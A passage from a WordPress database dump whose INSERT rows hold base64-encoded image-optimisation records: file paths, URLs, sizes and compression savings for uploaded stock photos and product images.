93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTE2MDB4MTE5Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI1OTM2ODAtMTYwMHgxMTk3LmpwZyIsInJlZHVjdGlvbiI6MjUwNCwidGltZSI6MTQ4MzU0ODM1NiwiaWQiOjI0NzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo3MTMsInRpbWUiOjE0ODM1NDgzNTksImlkIjoyNDc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjU5MzY4MC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjU5MzY4MC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjU5MzY4MC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTg3LCJ0aW1lIjoxNDgzNTQ4MzYzLCJpZCI6MjQ3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI1OTM2ODAtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI1OTM2ODAtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI1OTM2ODAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjY0NCwidGltZSI6MTQ4MzU0ODM2NiwiaWQiOjI0NzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5ODEsInRpbWUiOjE0ODM1NDgzNzAsImlkIjoyNDc1fV0='); 
INSERT INTO `wp_postmeta` VALUES (28804, 2463, 'wpfc_optimisation_reduction', '2530443'); 
INSERT INTO `wp_postmeta` VALUES (28805, 2463, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzg0MTMxNjI2LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzg0MTMxNjI2LmpwZyIsIndpZHRoIjozMDQ0LCJoZWlnaHQiOjIwMjIsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYuanBnIiwicmVkdWN0aW9uIjoyNTMwNDM1LCJ0aW1lIjoxNDgzNTQ4MzgyLCJpZCI6IjI0NjMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184NDEzMTYyNi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184NDEzMTYyNi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184NDEzMTYyNi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODM4NSwiaWQiOjI0NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzg0MTMxNjI2LTgwMHg1MzEuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzg0MTMxNjI2LTgwMHg1MzEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzg0MTMxNjI2LTgwMHg1MzEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4Mzg4LCJpZCI6MjQ2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtNzY4eDUxMC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtNzY4eDUxMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtNzY4eDUxMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgzOTIsImlkIjoyNDYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184NDEzMTYyNi0xNjAweDEwNjMuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtMTYwMHgxMDYzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184NDEzMTYyNi0xNjAweDEwNjMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4Mzk2LCJpZCI6MjQ2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgzOTgsImlkIjoyNDYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184NDEzMTYyNi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184NDEzMTYyNi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184NDEzMTYyNi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODQwMCwiaWQiOjI0NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzg0MTMxNjI2LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzg0MTMxNjI2LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzg0MTMxNjI2LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NDAzLCJpZCI6MjQ2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODQxMzE2MjYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg0MDYsImlkIjoyNDYzfV0='); 
INSERT INTO `wp_postmeta` VALUES (28806, 2462, 'wpfc_optimisation_reduction', '123063'); 
INSERT INTO `wp_postmeta` VALUES (28807, 2462, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3MtMTIyMC1iZWFkcy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tzLTEyMjAtYmVhZHMuanBnIiwid2lkdGgiOjEwNTAsImhlaWdodCI6NDA2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwva3MtMTIyMC1iZWFkcy5qcGciLCJyZWR1Y3Rpb24iOjEyMzA1NiwidGltZSI6MTQ4MzU0ODQxNCwiaWQiOiIyNDYyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcy0xMjIwLWJlYWRzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3MtMTIyMC1iZWFkcy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2tzLTEyMjAtYmVhZHMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg0MTYsImlkIjoyNDYyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tzLTEyMjAtYmVhZHMtODAweDMwOS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjMwOSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcy0xMjIwLWJlYWRzLTgwMHgzMDkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwva3MtMTIyMC1iZWFkcy04MDB4MzA5LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODQxOSwiaWQiOjI0NjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3MtMTIyMC1iZWFkcy03Njh4Mjk3LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6Mjk3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tzLTEyMjAtYmVhZHMtNzY4eDI5Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9rcy0xMjIwLWJlYWRzLTc2OHgyOTcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NDIxLCJpZCI6MjQ2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcy0xMjIwLWJlYWRzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3MtMTIyMC1iZWFkcy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2tzLTEyMjAtYmVhZHMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg0MjMsImlkIjoyNDYyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tzLTEyMjAtYmVhZHMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcy0xMjIwLWJlYWRzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwva3MtMTIyMC1iZWFkcy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODQyNSwiaWQiOjI0NjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3MtMTIyMC1iZWFkcy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tzLTEyMjAtYmVhZHMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9rcy0xMjIwLWJlYWRzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NDI4LCJpZCI6MjQ2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcy0xMjIwLWJlYWRzLTUxMHg0MDYuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo0MDYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3MtMTIyMC1iZWFkcy01MTB4NDA2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2tzLTEyMjAtYmVhZHMtNTEweDQwNi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg0MzAsImlkIjoyNDYyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28808, 2461, 'wpfc_optimisation_reduction', '42744'); 
INSERT INTO `wp_postmeta` VALUES (28809, 2461, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS1MtMTIyMC1UcmVhdG1lbnQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9LUy0xMjIwLVRyZWF0bWVudC5qcGciLCJ3aWR0aCI6MjY5LCJoZWlnaHQiOjQ1MiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0tTLTEyMjAtVHJlYXRtZW50LmpwZyIsInJlZHVjdGlvbiI6NDI3NDAsInRpbWUiOjE0ODM1NDg0MzcsImlkIjoiMjQ2MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS1MtMTIyMC1UcmVhdG1lbnQtMjY5eDM0MC5qcGciLCJ3aWR0aCI6MjY5LCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9LUy0xMjIwLVRyZWF0bWVudC0yNjl4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0tTLTEyMjAtVHJlYXRtZW50LTI2OXgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NDM5LCJpZCI6MjQ2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9LUy0xMjIwLVRyZWF0bWVudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tTLTEyMjAtVHJlYXRtZW50LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvS1MtMTIyMC1UcmVhdG1lbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg0NDEsImlkIjoyNDYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tTLTEyMjAtVHJlYXRtZW50LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS1MtMTIyMC1UcmVhdG1lbnQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9LUy0xMjIwLVRyZWF0bWVudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODQ0MywiaWQiOjI0NjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0